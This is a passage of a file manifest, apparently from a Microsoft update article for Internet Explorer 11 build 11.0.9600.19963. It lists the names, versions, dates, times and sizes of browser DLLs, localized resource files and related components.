\nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 10,752 \nDiagnosticsTap.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 10,752 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 307,200 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 293,888 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 290,304 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 289,280 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 299,008 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 303,104 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:47| 282,112 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 283,648 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 291,840 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 299,520 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 275,968 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 290,816 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 293,376 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 296,960 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 258,048 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 256,512 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 289,280 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 288,256 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 285,184 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 295,424 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 297,472 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 292,864 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 295,424 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 294,400 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 294,400 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 292,864 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 290,816 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 288,768 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 286,208 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 281,600 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 286,720 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 292,352 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 242,176 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 243,200 \nmshtml.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 243,200 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 61,440 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 73,728 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 67,584 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 67,584 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 74,240 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 78,848 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:47| 61,440 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 74,752 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 62,464 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 68,096 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 75,264 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 61,440 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 68,608 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 72,192 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 73,216 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 41,472 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 37,888 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 68,608 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 67,584 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 65,536 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 74,240 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 70,656 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 71,168 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 71,680 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 71,168 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 69,632 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 68,096 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 68,608 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 68,096 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 65,536 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 59,904 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 65,536 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 69,120 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 29,696 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 30,720 \nF12Resources.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:47| 77,824 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 276,480 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 46,080 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 51,712 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 54,272 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 48,128 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 47,616 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 50,688 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 45,056 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 39,936 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 39,424 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 47,616 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 47,616 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 51,200 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 50,688 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 50,176 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 49,664 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 48,640 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 48,128 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 49,152 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 48,128 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 35,328 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 35,328 \nurlmon.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 35,328 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 11,264 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:47| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 9,216 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 7,680 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 7,680 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 10,752 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 9,728 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 10,240 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 6,656 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 6,656 \noccache.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 6,656 \nwininet.dll| 11.0.9600.19963| 12-Feb-2021| 18:15| 4,859,904 \njsproxy.dll| 11.0.9600.19963| 12-Feb-2021| 19:08| 54,784 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 114,176 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 130,560 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 124,928 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 122,880 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 130,048 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 138,240 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:47| 114,688 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 131,584 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 117,760 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 122,368 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 134,144 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 107,008 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 123,392 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 127,488 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 128,512 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 88,576 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 82,944 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 125,440 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 123,392 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:01| 120,320 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 130,560 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 129,024 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 125,952 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 129,024 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 128,000 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 129,024 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 124,416 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 121,856 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 115,712 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 123,904 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 125,440 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 72,704 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 73,728 \ninetcpl.cpl.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 73,728 \niedkcs32.dll| 18.0.9600.19963| 13-Feb-2021| 12:45| 390,560 \ninstall.ins| Not versioned| 12-Feb-2021| 16:26| 464 \nieapfltr.dat| 10.0.9301.0| 25-Jun-2019| 6:11| 616,104 \nieapfltr.dll| 11.0.9600.19963| 12-Feb-2021| 17:53| 800,768 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:47| 88,064 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.19963| 12-Feb-2021| 19:19| 666,624 \niedvtool.dll| 11.0.9600.19963| 12-Feb-2021| 21:02| 950,784 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:21| 50,176 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:53| 491,008 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 316,416 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 12-Feb-2021| 16:23| 11,892 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 3,584 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 3,584 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 4,096 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 3,584 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 3,584 \nF12.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:51| 245,248 \nF12Resources.dll| 11.0.9600.19963| 12-Feb-2021| 19:24| 10,949,120 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:46| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:48| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:49| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:50| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:48| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:51| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:52| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:53| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:54| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:55| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:56| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:57| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:58| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:59| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:00| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:02| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:03| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:04| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:05| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:06| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:07| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:08| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:09| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:10| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:11| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:12| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:13| 2,048 \nF12Tools.dll.mui| 11.0.9600.19963| 13-Feb-2021| 13:14| 2,048 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:50| 372,224 \nF12.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 1,422,848 \nmsfeeds.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 809,472 \nmsfeeds.mof| Not versioned| 12-Feb-2021| 16:34| 1,518 \nmsfeedsbs.mof| Not versioned| 12-Feb-2021| 16:34| 1,574 \nmsfeedsbs.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 60,416 \nmsfeedssync.exe| 11.0.9600.19963| 12-Feb-2021| 19:17| 13,312 \nhtml.iec| 2019.0.0.19963| 12-Feb-2021| 19:15| 417,280 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:42| 92,672 \nmshtmlmedia.dll| 11.0.9600.19963| 12-Feb-2021| 18:26| 1,360,384 \nmshtml.dll| 11.0.9600.19963| 12-Feb-2021| 21:02| 25,762,816 \nmshtml.tlb| 11.0.9600.19963| 12-Feb-2021| 19:29| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 12-Feb-2021| 16:23| 3,228 \nieetwcollector.exe| 11.0.9600.19963| 12-Feb-2021| 19:04| 116,224 \nieetwproxystub.dll| 11.0.9600.19963| 12-Feb-2021| 19:15| 48,640 \nieetwcollectorres.dll| 11.0.9600.19963| 12-Feb-2021| 19:29| 4,096 \nielowutil.exe| 11.0.9600.19963| 12-Feb-2021| 19:06| 222,720 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:48| 870,400 \nIEShims.dll| 11.0.9600.19963| 12-Feb-2021| 17:57| 387,072 \nWindows Pop-up Blocked.wav| Not versioned| 25-Jun-2019| 6:16| 85,548 \nWindows Information Bar.wav| Not versioned| 25-Jun-2019| 6:16| 23,308 \nWindows Feed Discovered.wav| Not versioned| 25-Jun-2019| 6:16| 19,884 \nWindows Navigation Start.wav| Not versioned| 25-Jun-2019| 6:16| 11,340 \nbing.ico| Not versioned| 25-Jun-2019| 6:14| 5,430 \nieUnatt.exe| 11.0.9600.19963| 12-Feb-2021| 19:04| 144,384 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 13-Feb-2021| 13:47| 2,956 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:44| 628,736 \nMemoryAnalyzer.dll| 11.0.9600.19963| 12-Feb-2021| 19:01| 1,862,656 \nMshtmlDac.dll| 11.0.9600.19963| 12-Feb-2021| 19:14| 88,064 \nnetworkinspection.dll| 11.0.9600.19963| 12-Feb-2021| 18:38| 1,217,024 \noccache.dll| 11.0.9600.19963| 12-Feb-2021| 18:39| 152,064 \ndesktop.ini| Not versioned| 25-Jun-2019| 6:12| 65 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:30| 262,144 \ndesktop.ini| Not versioned| 25-Jun-2019| 6:12| 65 \nmsrating.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 199,680 \nicrav03.rat| Not versioned| 25-Jun-2019| 6:12| 8,798 \nticrf.rat| Not versioned| 25-Jun-2019| 6:12| 1,988 \niertutil.dll| 11.0.9600.19963| 12-Feb-2021| 19:17| 2,915,840 \nsqmapi.dll| 6.2.9200.16384| 13-Feb-2021| 12:44| 286,088 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 18:28| 728,064 \niernonce.dll| 11.0.9600.19963| 12-Feb-2021| 19:07| 34,304 \niesetup.dll| 11.0.9600.19963| 12-Feb-2021| 19:16| 66,560 \nieuinit.inf| Not versioned| 12-Feb-2021| 17:31| 16,303 \ninseng.dll| 11.0.9600.19963| 12-Feb-2021| 18:46| 107,520 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:45| 219,648 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:07| 172,032 \nTimeline.cpu.xml| Not versioned| 25-Jun-2019| 6:12| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 1,018,880 \nieframe.dll.mui| 11.0.9600.19963| 13-Feb-2021| 12:47| 2,066,432 